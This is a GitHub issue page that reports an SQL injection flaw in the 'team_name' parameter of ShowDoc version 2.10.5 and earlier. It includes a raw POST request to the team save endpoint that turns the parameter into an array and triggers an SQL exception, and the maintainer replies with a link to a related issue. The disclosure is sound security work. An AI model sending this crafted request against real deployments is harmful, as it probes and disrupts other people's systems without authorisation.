showdoc icon indicating copy to clipboard operation
showdoc copied to clipboard

Published 20 hours ago verified publisher icon star7th

SQL injection at 'team_name' parameter

Open haxpunk1337 opened this issue 3 years ago • 1 comments

Hello Team,

Software Link: https://github.com/star7th/showdoc/releases/tag/v2.10.5 Version: <= 2.10.5

Description: Manipulating parameter name team_name to team_name%5B%5D throws SQL exception

Steps to generate:

raw request

POST /server/index.php?s=/api/team/save HTTP/2
Host: localhost
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: PHPSESSID=<SESSION_COOKIE>; think_language=en-US; cookie_token=<TOKEN>
Content-Length: 24

id=121&team_name%5B%5D=S

SQL 2

Thank You

haxpunk1337 avatar May 26 '22 18:05 haxpunk1337

https://github.com/star7th/showdoc/issues/1710

star7th avatar May 27 '22 00:05 star7th